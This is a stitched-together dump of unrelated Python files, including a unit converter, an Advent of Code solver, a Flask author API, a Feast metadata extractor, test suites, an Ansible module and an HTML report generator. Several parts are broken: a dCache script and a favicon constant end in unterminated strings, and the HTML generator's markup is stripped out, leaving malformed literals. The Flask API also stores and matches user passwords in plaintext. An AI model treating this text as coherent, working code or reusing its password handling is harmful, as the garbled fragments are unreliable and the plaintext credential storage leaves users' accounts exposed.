:param FromUnit: the unit the original value is in :param ToUnit: the unit you want the value converted to :param Value: the original value """ FromUnit = Simplify(FromUnit) ToUnit = Simplify(ToUnit) try: FromUnit = self.Synonyms[FromUnit] except KeyError: raise InvalidUnitError((FromUnit, self.Name)) try: ToUnit = self.Synonyms[ToUnit] except KeyError: raise InvalidUnitError((ToUnit, self.Name)) A1 = self.Convertdata[FromUnit][0] B1 = self.Convertdata[FromUnit][1] A2 = self.Convertdata[ToUnit][0] B2 = self.Convertdata[ToUnit][1] to_val = ((Value + B1) * A1 / A2) - B2 return to_val class DensityConverterClass(ConverterClass): """ Special case class for Density conversion. handles the special case of API gravity, etc. """ def Convert(self, FromUnit, ToUnit, Value): """ Convert(FromUnit, ToUnit, Value) returns a new value, in the units of ToUnit. :param FromUnit: the unit the original value is in :param ToUnit: the unit you want the value converted to :param Value: the original value """ FromUnit = Simplify(FromUnit) ToUnit = Simplify(ToUnit) try: FromUnit = self.Synonyms[FromUnit] except KeyError: raise InvalidUnitError((FromUnit, self.Name)) try: ToUnit = self.Synonyms[ToUnit] except KeyError: raise InvalidUnitError((ToUnit, self.Name)) if FromUnit == "apidegree": # another Special case (could I do this the same as temp?) Value = 141.5 / (Value + 131.5) FromUnit = u"specificgravity(15\xb0c)" if ToUnit == "apidegree": ToVal = (141.5 / (Value * self.Convertdata[FromUnit] / self.Convertdata[u"specificgravity(15\xb0c)"]) - 131.5) else: ToVal = (Value * self.Convertdata[FromUnit] / self.Convertdata[ToUnit]) return ToVal class OilQuantityConverter: """ class for Oil Quantity conversion -- mass to/from Volume requires density info as well """ @classmethod def ToVolume(self, Mass, MassUnits, Density, DensityUnits, VolumeUnits): """ Convert Oil Mass to Volume :param Mass: mass you want converted to volume :param MassUnits: unit of mass input :param Density: density of oil :param DensityUnits: units of density :param VolumeUnits: units of volume desired """ Density = convert("Density", DensityUnits, "kg/m^3", Density) Mass = convert("Mass", MassUnits, "kg", Mass) Volume = Mass / Density Volume = convert("Volume", "m^3", VolumeUnits, Volume) return Volume @classmethod def ToMass(self, Volume, VolUnits, Density, DensityUnits, MassUnits): """ Convert Oil Mass to Volume :param Volume: volume you want converted to mass :param VolumeUnits: units of volume input :param Density: density of oil :param DensityUnits: units of density :param MassUnits: unit of mass desired for output """ Density = convert("Density", DensityUnits, "kg/m^3", Density) Volume = convert("Volume", VolUnits, "m^3", Volume) Mass = Volume * Density Mass = convert("Mass", "kg", MassUnits, Mass) return Mass # create the converter objects Converters = {} for (unittype, data) in ConvertDataUnits.items(): if unittype.lower() == 'temperature': Converters["temperature"] = TempConverterClass(unittype, data) elif unittype.lower() == 'density': Converters["density"] = DensityConverterClass(unittype, data) else: Converters[Simplify(unittype)] = ConverterClass(unittype, data) def is_supported(unit): """ Returns True is the unit is in the list of supported units for the API that does not require unit_type """ return Simplify(unit) in UNIT_TYPES def convert(unit1, unit2, value, unit_type=None): """ convert(unit1, unit2, value, unit_type) :param unit1: the unit the original value is in :param unit2: the unit you want the value converted to :param 
value: the original value If unit_type is None, then it will look in the data to see if it can figure out what unit type to use. so you should be able to do: convert(unit1='meter', unit2='feet', value=32) NOTE: Some odd units have overlapping names, so only the more common one is used (oz is mass, not fluid oz, for instance). You can get around this by using a more precise name ('fluid oz') or specify the unit type. If you do want to specify the unit type, you can use the "old" API: convert(unit_type, unit1, unit2, value) such as: convert('volume', 'oz', 'cc', 25) :param unit_type: the type of the unit: 'mass', 'length', etc. :param unit1: the unit the original value is in :param unit2: the unit you want the value converted to :param value: the original value """ if unit_type is None: # the new API: no need to specify unit type unit1, unit2 = (Simplify(s) for s in (unit1, unit2)) try: unit_type = UNIT_TYPES[unit1] except KeyError: raise NotSupportedUnitError(unit1) try: unit_type2 = UNIT_TYPES[unit2] except KeyError: raise NotSupportedUnitError(unit2) if unit_type != unit_type2: raise UnitConversionError("Cannot convert {0} to {1}" .format(unit1, unit2)) unit_type = Simplify(unit_type) else: # the old API: specify the unit type # re-defining the inputs: unit_type, unit1, unit2, value = unit1, unit2, value, unit_type unit_type, unit1, unit2 = (Simplify(s) for s in (unit_type, unit1, unit2)) try: Converter = Converters[unit_type] except KeyError: raise InvalidUnitTypeError(unit_type) return Converter.Convert(unit1, unit2, value) # so as to have the old, non-PEP8 compatible name # This is used by TapInput (any more???) def Convert(*args, **kwargs): """ so as to have the old, non-PEP8 compatible name This is used by TapInput (any more???) for new code, use convert() """ warnings.warn('"Convert" is deprecated -- use "convert()"', DeprecationWarning) return convert(*args, **kwargs) # fixme: we should probably simjply get rid of these and use ValueError class UnitConversionError(ValueError): """ Exception type for unit conversion errors Perhaps this should be subclassed more, but at the moment, it doesn't do anything special """ pass class NotSupportedUnitError(UnitConversionError): def __init__(self, unit): self.unit = unit def __str__(self): return ('The unit: {} is not supported or not recognized' .format(self.unit)) class InvalidUnitError(UnitConversionError): """ Exception raised when a unit is not in the Unit conversion database """ def __init__(self, unit_unit_type): if isinstance(unit_unit_type, (list, tuple)): (unit, unit_type) = unit_unit_type[:2] self.unit = unit self.type = unit_type if unit_type else "" else: super(InvalidUnitError, self).__init__(unit_unit_type) def __str__(self): if hasattr(self, 'unit'): return ('The unit: {} is not in the list for Unit Type: {}' .format(self.unit, self.type)) else: return super(InvalidUnitError, self).__str__() class InvalidUnitTypeError(UnitConversionError): """ Exception raised when a unit is not in the Unitconversion database """ def __init__(self, unitType): self.unitType = unitType def __str__(self): return ('The unit type: {} is not in the UnitConversion database' .format(self.unitType)) xman/chunk.py from typing import Iterable, Sequence def send_chunked_response(wfile, content: bytes): content_chunks: Iterable[bytes] = chunks(content, 512) for chunk in content_chunks: tosend = ('%X' % len(chunk)).encode('utf-8') + b'\r\n' + chunk + b'\r\n' wfile.write(tosend) wfile.write('0\r\n\r\n'.encode('utf-8')) def chunks(lst: Sequence, n: int) -> 
Iterable: for i in range(0, len(lst), n): yield lst[i:i + n] from typing import List import os EMPTY_OCTO = 0 FULL_OCTO = 10 class Board(object): def __init__(self): self.__board = [] self.total_flashes = 0 def __str__(self): return "\n".join( [" ".join([str(cell) for cell in row]) for row in self.__board] ) def add_row(self, row: List[int]): self.__board.append(row) def is_all_zeros(self): return all(all(cell == 0 for cell in row) for row in self.__board) def inc_energy(self, row_idx, col_idx, count_zeros): if row_idx < 0 or row_idx >= len(self.__board): return if col_idx < 0 or col_idx >= len(self.__board[0]): return if not count_zeros and self.__board[row_idx][col_idx] == EMPTY_OCTO: return self.__board[row_idx][col_idx] = min( self.__board[row_idx][col_idx] + 1, FULL_OCTO ) def charge_vicinity(self, row_idx, col_idx): # charge neighbours for dy in [-1, 0, +1]: for dx in [-1, 0, +1]: if dy == dx == 0: continue self.inc_energy(row_idx + dy, col_idx + dx, count_zeros=False) def step(self): # 1. Inc energy for each octopus by 1 for row_idx in range(len(self.__board)): for col_idx in range(len(self.__board[row_idx])): self.inc_energy(row_idx, col_idx, count_zeros=True) # 2. Flash octopuses while True: must_flash = set() for row_idx in range(len(self.__board)): for col_idx in range(len(self.__board[row_idx])): if self.__board[row_idx][col_idx] != FULL_OCTO: continue must_flash.add((row_idx, col_idx)) self.__board[row_idx][col_idx] = EMPTY_OCTO if not must_flash: break self.total_flashes += len(must_flash) for coords in must_flash: self.charge_vicinity(*coords) def silver(board: Board): for _ in range(100): board.step() return board.total_flashes def gold(board: Board): step = 1 while True: board.step() if board.is_all_zeros(): break step += 1 return step def parse(lines: List[str]): board = Board() for line in lines: board.add_row(list(map(int, line.strip()))) return board def solve(): lines = open(os.path.join(os.path.dirname(__file__), "input"), "rt").readlines() return "DAY 11", silver(parse(lines)), gold(parse(lines)) bindata.py #!/usr/bin/env python3 import sys print('package main') print() print('var bindata = map[string][]byte{') for line in sys.stdin: dest, fname = line.strip().split(None, 1) # print('//', repr(dest), repr(fname), file=sys.stderr) with open(fname, 'rb') as f: print('\t', '"', dest, '": []byte("', sep='', end='') print(''.join('\\x{:02x}'.format(c) for c in f.read()), end='') print('"),') pass print('}') Python/Desafios/tarefas/exe 43 IMC.py1-10 P = float(input('qual seu peso (kg) >')) H = float(input('qual sua altura (m) >')) i = P/ (H ** 2) def e(estado): print('o seu IMC e {:.f2}'.format(i)) print('você esta {}'.format(estado)) if i < 18.5: e('abaixo do peso') elif 18.5 < i < 25: e('peso ideal') elif 25 < i < 30: e('acima do peso') elif 30 < i < 40: e('obesidade') else: e('obesidade morbida') #!/usr/bin/env python import json import requests import sys base_url = "https://fndca3b.fnal.gov:3880/api/v1/bulk-requests" if __name__ == "__main__": session = requests.Session() session.verify = "/etc/grid-security/certificates" session.cert = "/tmp/x509up_u8637" session.key = " headers = { "accept" : "application/json", "content-type" : "application/json"} data = { "target" : sys.argv[1], "activity" : "PIN", "clearOnSuccess" : True, "clearOnFailure" : True, "expandDirectories" : None, "arguments": { "lifetime": 24, "lifetime-unit": "HOURS" } } r = session.post(base_url, data = json.dumps(data), headers=headers) r.raise_for_status() print (r.status_code, 
r.headers['request-url']) 0 import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sn df = pd.read_csv('data_preparation/Diabetes.csv') print(df.head(),"\n\n") cols = [c for c in df.columns if c not in ["Pregnancies","Outcome"]] df_copy = df.copy() df_copy[cols] = df_copy[cols].replace({0: np.NaN}) print(df_copy.head(),"\n\n") print(df_copy.info()) #Scatter matrix pd.plotting.scatter_matrix(df_copy,figsize=(7,7)) df2 = df_copy.dropna() colors = df2["Outcome"].map(lambda x:"#44d9ff" if x else "#f95b4a") pd.plotting.scatter_matrix(df2,figsize=(7,7),color=colors) '''The file defines the author api This api will only return authors' id, name and gs_link ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - GET /api/authors/id return the specific author - GET /api/authors/ return all - GET /api/authors/?group_id= return authors inside the group - POST /api/authors/ - registration request body with the json - 203 register successfully - 409 conflict data or illegal parameter ''' from subprocess import Popen from flask import (Blueprint, request, jsonify, g, abort, session, redirect, url_for) from flask.views import MethodView from .sessions import select_authors, SessionView ALLOWED_FIELDS = "id, name, gs_link" def select_author_by_id(author_id): sql = "SELECT " + ALLOWED_FIELDS + " FROM authors WHERE id=%s" with g.db.cursor() as cursor: cursor.execute(sql, (author_id,)) author = cursor.fetchone() return author def select_all_authors(): sql = "SELECT " + ALLOWED_FIELDS + " FROM authors WHERE is_registered=True" with g.db.cursor() as cursor: cursor.execute(sql) authors = cursor.fetchall() return authors def select_authors_by_group(group_id): sql = ("SELECT " + ALLOWED_FIELDS + " FROM authors_and_groups " "INNER JOIN authors ON author_id=id WHERE group_id=%s AND is_registered=True") with g.db.cursor() as cursor: #print(cursor.mogrify(sql, (group_id,))) cursor.execute(sql, (group_id,)) authors = cursor.fetchall() return authors def insert_author(author): sql = ("INSERT INTO authors (name, account, password, " "gs_link) VALUES (%s, %s, %s, %s)") with g.db.cursor() as cursor: cursor.execute(sql, (author['name'], author['account'], author['password'], author['gs_link'],) ) sql = "SELECT * FROM authors WHERE account=%s AND password=%s" cursor.execute(sql, (author['account'], author['password'])) author = cursor.fetchone() g.db.commit() return author def insert_author_with_code(author): sql = ("UPDATE authors SET name=%s, account=%s, password=%s, gs_link=%s, " "is_registered=1 WHERE id=%s") with g.db.cursor() as cursor: cursor.execute(sql, (author['name'], author['account'], author['password'], author['gs_link'], author['invitation_code'],)) sql = "SELECT * FROM authors WHERE account=%s AND password=%s" cursor.execute(sql, (author['account'], author['password'])) author = cursor.fetchone() g.db.commit() return author def insert_raw_author(): sql = "INSERT INTO authors (is_registered) VALUES (0)" with g.db.cursor() as cursor: cursor.execute(sql) g.db.commit() sql = "SELECT LAST_INSERT_ID()" cursor.execute(sql) return cursor.fetchone()['LAST_INSERT_ID()'] def update_gs_link(data): sql = "UPDATE authors SET gs_link=%s WHERE id=%s" with g.db.cursor() as cursor: cursor.execute(sql, (data['gs_link'], data['id'])) sql = "DELETE FROM authors_and_papers WHERE author_id=%s" cursor.execute(sql, (data['id'],)) g.db.commit() class AuthorView(MethodView): def get(self, author_id = None): if author_id != None: author = select_author_by_id(author_id) return jsonify(author) group_id 
= request.args.get('group_id', None) if group_id: authors = select_authors_by_group(group_id) else: authors = select_all_authors() return jsonify(authors) def post(self): author = request.get_json() if author['invitation_code']: author = insert_author_with_code(author) else: author = insert_author(author) Popen(["python", "web/spiders/AuthorSpider.py", author['gs_link'], str(author['id']) ] ) # redirect with HTTP method preserved # https://stackoverflow.com/questions/15473626/make-a-post-request-while-redirecting-in-flask return redirect('api/sessions/', code=307) def put(self): data = request.get_json() if 'id' not in session: return ("", 404, {}) data['id'] = session['id'] if data['type'] == "gs_link": update_gs_link(data) Popen(["python", "web/spiders/AuthorSpider.py", data['gs_link'], str(data['id']) ] ) else: pass return ("", 200, {}) authors_blueprint = Blueprint('authors', __name__, url_prefix='/api') authors_view = AuthorView.as_view('authors') authors_blueprint.add_url_rule('/authors/', view_func=authors_view, methods=['GET']) authors_blueprint.add_url_rule('/authors/', view_func=authors_view, methods=['GET', 'POST', 'PUT']) # The MIT License (MIT). # Copyright (c) 2015, & contributors. from imapfw.interface import implements, checkInterfaces from imapfw.conf import Parser from .interface import ActionInterface # Annotations. from imapfw.annotation import ExceptionClass @checkInterfaces() @implements(ActionInterface) class UnitTests(object): """Run all the unit tests.""" honorHooks = False requireRascal = False def __init__(self): self._suite = None self._exitCode = 1 def exception(self, e: ExceptionClass) -> None: raise def getExitCode(self) -> int: return self._exitCode def init(self, parser: Parser) -> None: import unittest self._suite = unittest.TestSuite() # Load all available unit tests. from imapfw.testing.concurrency import TestConcurrency from imapfw.testing.rascal import TestRascal from imapfw.testing.folder import TestFolder from imapfw.testing.message import TestMessage, TestMessages from imapfw.testing.maildir import TestMaildirDriver from imapfw.testing.edmp import TestEDMP from imapfw.testing.types import TestTypeAccount, TestTypeRepository from imapfw.testing.architect import TestArchitect, TestDriverArchitect from imapfw.testing.architect import TestDriversArchitect from imapfw.testing.architect import TestEngineArchitect self._suite.addTest(unittest.makeSuite(TestConcurrency)) self._suite.addTest(unittest.makeSuite(TestRascal)) self._suite.addTest(unittest.makeSuite(TestFolder)) self._suite.addTest(unittest.makeSuite(TestMessage)) self._suite.addTest(unittest.makeSuite(TestMessages)) self._suite.addTest(unittest.makeSuite(TestMaildirDriver)) self._suite.addTest(unittest.makeSuite(TestEDMP)) self._suite.addTest(unittest.makeSuite(TestTypeAccount)) self._suite.addTest(unittest.makeSuite(TestTypeRepository)) self._suite.addTest(unittest.makeSuite(TestArchitect)) self._suite.addTest(unittest.makeSuite(TestDriverArchitect)) self._suite.addTest(unittest.makeSuite(TestDriversArchitect)) self._suite.addTest(unittest.makeSuite(TestEngineArchitect)) def run(self) -> None: import unittest runner = unittest.TextTestRunner(verbosity=2) testResult = runner.run(self._suite) if testResult.wasSuccessful(): self._exitCode = len(testResult.failures) Parser.addAction('unitTests', UnitTests, help="run the integrated unit tests") # Copyright Contributors to the Amundsen project. 
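# Added note (not part of the original header): a hedged usage sketch for the
# FeastExtractor defined below. The endpoint value and the _demo_ helper name
# are illustrative assumptions only; the config keys ("endpoint",
# "instance_name", "describe_feature_tables") come from the class constants.
def _demo_feast_extraction(endpoint="feast-core:6565"):
    from pyhocon import ConfigFactory
    extractor = FeastExtractor()  # resolved at call time, after the class is defined
    extractor.init(ConfigFactory.from_dict({"endpoint": endpoint}))
    # extract() returns one TableMetadata per call and None when exhausted
    record = extractor.extract()
    while record is not None:
        print(record)
        record = extractor.extract()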
# SPDX-License-Identifier: Apache-2.0 from typing import Iterator, Union from datetime import datetime import yaml from feast import Client from feast.feature_table import FeatureTable from pyhocon import ConfigFactory, ConfigTree from databuilder.extractor.base_extractor import Extractor from databuilder.models.table_metadata import TableMetadata, ColumnMetadata class FeastExtractor(Extractor): """ Extracts feature tables from Feast Core service. Since Feast is a metadata store (and not the database itself), it maps the following atributes: * a database is name of feast project * table name is a name of the feature table * columns are features stored in the feature table """ FEAST_SERVICE_CONFIG_KEY = "instance_name" FEAST_ENDPOINT_CONFIG_KEY = "endpoint" DESCRIBE_FEATURE_TABLES = "describe_feature_tables" DEFAULT_CONFIG = ConfigFactory.from_dict( {FEAST_SERVICE_CONFIG_KEY: "main", DESCRIBE_FEATURE_TABLES: True} ) def init(self, conf: ConfigTree) -> None: conf = conf.with_fallback(FeastExtractor.DEFAULT_CONFIG) self._feast_service = conf.get_string(FeastExtractor.FEAST_SERVICE_CONFIG_KEY) self._describe_feature_tables = conf.get_bool( FeastExtractor.DESCRIBE_FEATURE_TABLES ) self._client = Client( core_url=conf.get_string(FeastExtractor.FEAST_ENDPOINT_CONFIG_KEY) ) self._extract_iter: Union[None, Iterator] = None def get_scope(self) -> str: return "extractor.feast" def extract(self) -> Union[TableMetadata, None]: """ For every feature table from Feast, a multiple objets are extracted: 1. TableMetadata with feature table description 2. Programmatic Description of the feature table, containing metadata - date of creation and labels 3. Programmatic Description with Batch Source specification 4. (if applicable) Programmatic Description with Stream Source specification """ if not self._extract_iter: self._extract_iter = self._get_extract_iter() try: return next(self._extract_iter) except StopIteration: return None def _get_extract_iter(self) -> Iterator[TableMetadata]: for project in self._client.list_projects(): for feature_table in self._client.list_feature_tables(project=project): yield from self._extract_feature_table(project, feature_table) def _extract_feature_table( self, project: str, feature_table: FeatureTable ) -> Iterator[TableMetadata]: columns = [] for index, entity_name in enumerate(feature_table.entities): entity = self._client.get_entity(entity_name, project=project) columns.append( ColumnMetadata( entity.name, entity.description, entity.value_type, index ) ) for index, feature in enumerate(feature_table.features): columns.append( ColumnMetadata( feature.name, None, feature.dtype.name, len(feature_table.entities) + index, ) ) yield TableMetadata( "feast", self._feast_service, project, feature_table.name, None, columns, ) if self._describe_feature_tables: created_at = datetime.utcfromtimestamp( feature_table.created_timestamp.seconds ) description = f"* Created at **{created_at}**\n" if feature_table.labels: description += "* Labels:\n" for key, value in feature_table.labels.items(): description += f" * {key}: **{value}**\n" yield TableMetadata( "feast", self._feast_service, project, feature_table.name, description, description_source="feature_table_details", ) yield TableMetadata( "feast", self._feast_service, project, feature_table.name, f'```\n{yaml.dump(feature_table.to_dict()["spec"]["batchSource"])}```', description_source="batch_source", ) if feature_table.stream_source: yield TableMetadata( "feast", self._feast_service, project, feature_table.name, 
f'```\n{yaml.dump(feature_table.to_dict()["spec"]["streamSource"])}```', description_source="stream_source", ) elhachimi-ch/dst1-10 import numpy as np from sklearn.feature_extraction import DictVectorizer from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer import joblib from tensorflow.keras.utils import to_categorical from .lib import Lib from sklearn.preprocessing import MinMaxScaler import nltk class Vectorizer: __vectorizer = None __matrice = None def __init__(self, documents_as_list=None, vectorizer_type='count', ngram_tuple=(1,1), space_dimension=None, dataframe=None, preprocessing=None): if documents_as_list is not None: if vectorizer_type == 'count': cv = CountVectorizer(ngram_range=ngram_tuple) matrice = cv.fit_transform(documents_as_list) self.__vectorizer = cv self.__matrice = matrice elif vectorizer_type == 'tfidf': if preprocessing is None: tfidfv = TfidfVectorizer(max_features=space_dimension, preprocessor=self.preprocessor) matrice = tfidfv.fit_transform(documents_as_list) self.__vectorizer = tfidfv self.__matrice = matrice else: tfidfv = TfidfVectorizer(max_features=space_dimension, preprocessor=preprocessing) matrice = tfidfv.fit_transform(documents_as_list) self.__vectorizer = tfidfv self.__matrice = matrice elif vectorizer_type == 'custom': features = np.vectorize(Vectorizer.get_custom_features) data = features(documents_as_list) v = DictVectorizer() matrice = v.fit_transform(data) self.__vectorizer = v self.__matrice = matrice elif vectorizer_type == 'min_max': self.__vectorizer = MinMaxScaler() self.__matrice = self.__vectorizer.fit_transform(dataframe) else: pass def get_sparse_matrix(self): return self.__matrice def get_matrix(self): return self.__matrice.toarray() def get_vectorizer(self): return self.__vectorizer def get_features_names(self): return self.__vectorizer.get_feature_names() @staticmethod def tokenizer(doc): return doc.split() @staticmethod def preprocessor(doc): """def my_tokenizer(s): return s.split() vectorizer = CountVectorizer(tokenizer=my_tokenizer) """ tokens = doc.split(' ') result = [] for p in tokens: result.append(nltk.stem.PorterStemmer().stem(p)) return ' '.join(result) @staticmethod def get_custom_features(e): e = e.lower() return { 'f1': e[0], # First letter 'f2': e[0:2], # First 2 letters 'f3': e[0:3], # First 3 letters 'l1': e[-1], 'l2': e[-2:], 'l3': e[-3:], } def get_docs_projections_as_sparse(self, documents_as_liste, projection_type='normal'): if projection_type != 'normal': documents_as_liste = np.vectorize(Vectorizer.get_custom_features)(documents_as_liste) return self.__vectorizer.transform(documents_as_liste) def save_vectorizer(self, vectorizer_path='data/vectorizer.data'): out_vectorizer_file = open(vectorizer_path, 'wb') joblib.dump(self.__vectorizer, out_vectorizer_file) out_vectorizer_file.close() def load_vectorizer(self, vectorizer_path='data/vectorizer.data'): self.__vectorizer = joblib.load(open(vectorizer_path, 'rb')) def reshape(self, new_shpae_tuple): self.__matrice = np.array(self.__matrice.reshape(new_shpae_tuple)) def get_sum_by_columns_as_list(self): count_list = np.array(self.get_sparse_matrix().sum(axis=0)) count_list = count_list.reshape(self.get_shape()[1]) return count_list def get_sum_by_rows_as_list(self): count_list = np.array(self.get_sparse_matrix().sum(axis=1)) count_list = count_list.reshape(self.get_shape()[0]) return count_list def get_shape(self): return self.__matrice.shape @staticmethod def to_one_hot(vecteur_of_categories): """converti une colone avec des categorie mais 
numerique en forme One Hot Encoding exemple versicolor est de label 2 se transform en [0 0 1]""" return Lib.to_categorical(vecteur_of_categories) @staticmethod def get_reshaped_matrix(matrix, new_shape_tuple): print(new_shape_tuple) new_matrix = matrix.reshape(new_shape_tuple) print('okkkk {}'.format(new_matrix.shape)) return new_matrix @staticmethod def reshape_images_for_cnn(images_as_liste): images_as_liste.reshape(images_as_liste.shape[0], images_as_liste.shape[1], images_as_liste.shape[1], 1) \ .astype('float32') import os.path import pytest from matryoshka_tester.helpers import GitRepositoryBuild GOLANG_MAX_CONTAINER_SIZE_ON_DISK = 1181116006 # 1.1GB uncompressed def test_go_size(host, container, container_runtime): assert ( container_runtime.get_image_size(container.image) < GOLANG_MAX_CONTAINER_SIZE_ON_DISK ) def test_go_version(container): assert container.version in container.connection.check_output("go version") @pytest.mark.parametrize( "container_git_clone", [ GitRepositoryBuild( repository_url="https://github.com/rancher/fleet.git", build_command="make", ).to_pytest_param() ], indirect=["container_git_clone"], ) def test_fleet(container, container_git_clone): cmd = container.connection.run(container_git_clone.test_command) assert cmd.rc == 0 @pytest.mark.parametrize( "host_git_clone", [ GitRepositoryBuild( repository_url="https://github.com/mvarlese/fleet", ).to_pytest_param() ], indirect=["host_git_clone"], ) def test_fleet(host, host_git_clone, dapper): dest, _ = host_git_clone host.run_expect( [0], f"cd {os.path.join(dest, 'fleet')} && {dapper} build && {dapper} ci", ) 0 """Validate RPKI state via Cloudflare GraphQL API.""" # Project from hyperglass.log import log from hyperglass.external._base import BaseExternal RPKI_STATE_MAP = {"Invalid": 0, "Valid": 1, "NotFound": 2, "DEFAULT": 3} RPKI_NAME_MAP = {v: k for k, v in RPKI_STATE_MAP.items()} def rpki_state(prefix, asn): """Get RPKI state and map to expected integer.""" log.debug("Validating RPKI State for {p} via AS{a}", p=prefix, a=asn) state = 3 query = 'query GetValidation {{ validation(prefix: "{prefix}", asn: {asn}) {{ state }} }}'.format( # noqa: E501 prefix=prefix, asn=asn ) try: with BaseExternal(base_url="https://rpki.cloudflare.com") as client: response = client._post("/api/graphql", data={"query": query}) validation_state = ( response.get("data", {}).get("validation", {}).get("state", "DEFAULT") ) state = RPKI_STATE_MAP[validation_state] except Exception: state = 3 log.debug( "RPKI Validation State for {p} via AS{a} is {s}", p=prefix, a=asn, s=RPKI_NAME_MAP[state], ) return state from .routes import auth #!/usr/bin/python # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. DOCUMENTATION = ''' module: dms_queue_info short_description: Get info about DMS queues extends_documentation_fragment: opentelekomcloud.cloud.otc version_added: "0.1.2" author: " (@SebastianGode)" description: - Get info about DMS queues options: queue: description: - Name or ID of a target queue. Leave it empty to query all queues. 
type: str required: false requirements: ["openstacksdk", "otcextensions"] ''' RETURN = ''' dms_queues: description: Dictionary of Queues returned: changed type: list sample: [ { "created": 1517385090349, "description": "", "id": "12345678-73e4-449f-a157-53d5d9900e21", "max_consume_count": null, "name": "test-test", "queue_mode": "NORMAL", "redrive_policy": null, "retention_hours": null } ] ''' EXAMPLES = ''' # Query a single DMS Queue - opentelekomcloud.cloud.dms_queue_info: queue: 'test-test' register: dms-queue ''' from ansible_collections.opentelekomcloud.cloud.plugins.module_utils.otc import OTCModule class DmsQueueInfoModule(OTCModule): argument_spec = dict( queue=dict(required=False) ) module_kwargs = dict( supports_check_mode=True ) def run(self): data = [] if self.params['queue']: queue = self.conn.dms.find_queue( name_or_id=self.params['queue'] ) if queue: dt = queue.to_dict() dt.pop('location') data.append(dt) else: self.exit( changed=False, failed=True, message=('No Queue found with ID or Name: %s' % self.params['queue']) ) else: for raw in self.conn.dms.queues(): dt = raw.to_dict() dt.pop('location') data.append(dt) self.exit( changed=False, dms_queues=data ) def main(): module = DmsQueueInfoModule() module() if __name__ == '__main__': main() matibek/request_limiter import os import unittest from typing import Optional from django.http import HttpResponse from django.test import RequestFactory from request_limiter import request_limiter, LimitedIntervalStrategy, \ LimitStrategy, LimitException, django_request_limiter os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_settings') req_factory = RequestFactory() class MockStrategy(LimitStrategy): def __init__(self, allow: bool): self._allow = allow def allow(self, key: Optional[str] = None) -> bool: return self._allow def get_remaining(self, key: Optional[str] = None) -> float: return 1 def clean(self): pass class TestRequestLimiterDecorator(unittest.TestCase): def test_when_strategy_not_given_uses_limited_interval_strategy(self): limiter = request_limiter() self.assertTrue(isinstance(limiter.strategy, LimitedIntervalStrategy)) def test_when_strategy_allows_invokes_function(self): @request_limiter(strategy=MockStrategy(allow=True)) def test_func() -> bool: return True self.assertTrue(test_func()) def test_when_strategy_denies_raises_exception(self): @request_limiter(strategy=MockStrategy(allow=False)) def test_func() -> bool: return True self.assertRaises(LimitException, test_func) class TestDjangoRequestLimiter(unittest.TestCase): def test_limits_based_on_ip(self): @django_request_limiter @request_limiter(strategy=LimitedIntervalStrategy(requests=1)) def test_view(request): return True res1 = test_view(req_factory.post('/test/', REMOTE_ADDR='127.0.0.1')) assert res1, 'Expected first request to work' res2 = test_view(req_factory.post('/test/', REMOTE_ADDR='127.0.0.1')) assert isinstance(res2, HttpResponse), 'Expected limit http response' assert res2.status_code == 429, 'Expected 429 response code' # change Ip res3 = test_view(req_factory.post('/test/', REMOTE_ADDR='127.0.0.2')) assert res3, 'Expected different ip request to work' 1-10 import du from du.gerrit.ChangeStatus import ChangeStatus from urllib.parse import urlparse # Base64-encoded PNG favicon FAVICON = " class HtmlGenerator: """ Human readable HTML report generator """ # Report title DEFAULT_TITLE = "Report" @staticmethod def generate(reportInfo): result = """ """ # Title result += "%s" % HtmlGenerator.DEFAULT_TITLE # Favicon result += ( """ """ % FAVICON ) # CSS 
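# Note (added comment): the stylesheet emitted in this step is expected to
# define the row classes used by __generateCommitHtml further down
# (change_merged, change_pulled, change_cherrypicked, change_local), which
# style each commit row to match the legend table at the bottom of the report.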
result += """ """ result += """ """ result += ( '

DRepo v%s

\n' % du.__version_name__ ) result += "
" result += ( '\n' % reportInfo.manifest.selectedBuild.name ) result += ( '\n' % reportInfo.manifest.selectedBuild.root ) result += ( '\n' % ( reportInfo.userName, reportInfo.hostName, ) ) result += "
Build name %s
Build path %s
Node %s@%s

\n" # Generate a list of all the projects (with anchor links) result += "\n" result += '\n' for idx, proj in enumerate(reportInfo.projects): result += "\n" # Name result += '\n' % ( proj.manifestProject.name, proj.manifestProject.name, ) # Path result += ( '\n' % proj.manifestProject.path ) result += "\n" result += "
Project Path
%s/%s
\n" # Generate information per-project for proj in reportInfo.projects: result += HtmlGenerator.__generateProjectHtml(proj) result += "


" # Table legend result += """
Legend
Change was found on Gerrit, was not merged and the hash matches a remote patchset (most likely checked-out, or fast-forward pulled)
Change was found on Gerrit, was not merged and the commit hash wasn't matched with anything on remote (most likely cherry-picked)
Change was not found on Gerrit (possibly missing the 'Change-Id' attribute in the message)
Change was found on Gerrit and it was merged
""" result += "" return result @staticmethod def __generateProjectHtml(projectInfo): """ Generate project specific HTML @param projectInfo Project info """ result = "" remoteHttpUrl = projectInfo.manifestProject.remote.http result += "

" gerritUrl = ( "https://" + urlparse(projectInfo.manifestProject.remote.http).netloc ) # Gitweb URL for this project projectGitwebUrl = gerritUrl + "/gitweb?p=%s.git;" % ( projectInfo.manifestProject.name, ) result += '

' % projectInfo.manifestProject.name result += '%s' % ( projectGitwebUrl, projectInfo.manifestProject.name, ) result += "(" # Gitweb URL for this branch branchGitWebUrl = projectGitwebUrl + "a=shortlog;h=refs%%2Fheads%%2F%s" % ( projectInfo.manifestProject.branch, ) # Branch result += ( ' branch: %s\n' % (branchGitWebUrl, projectInfo.manifestProject.branch) ) # Tag name if projectInfo.tagInfo.headTagName: tagGitwebUrl = projectGitwebUrl + "a=tag;h=" + projectInfo.tagInfo.refHash result += ( " tag: %s\n" % (tagGitwebUrl, projectInfo.tagInfo.headTagName) ) # Head headGitWebUrl = projectGitwebUrl + "a=commit;h=" + projectInfo.tagInfo.headHash result += ( " head: %s\n" % (headGitWebUrl, projectInfo.tagInfo.headHash) ) result += ")" result += "

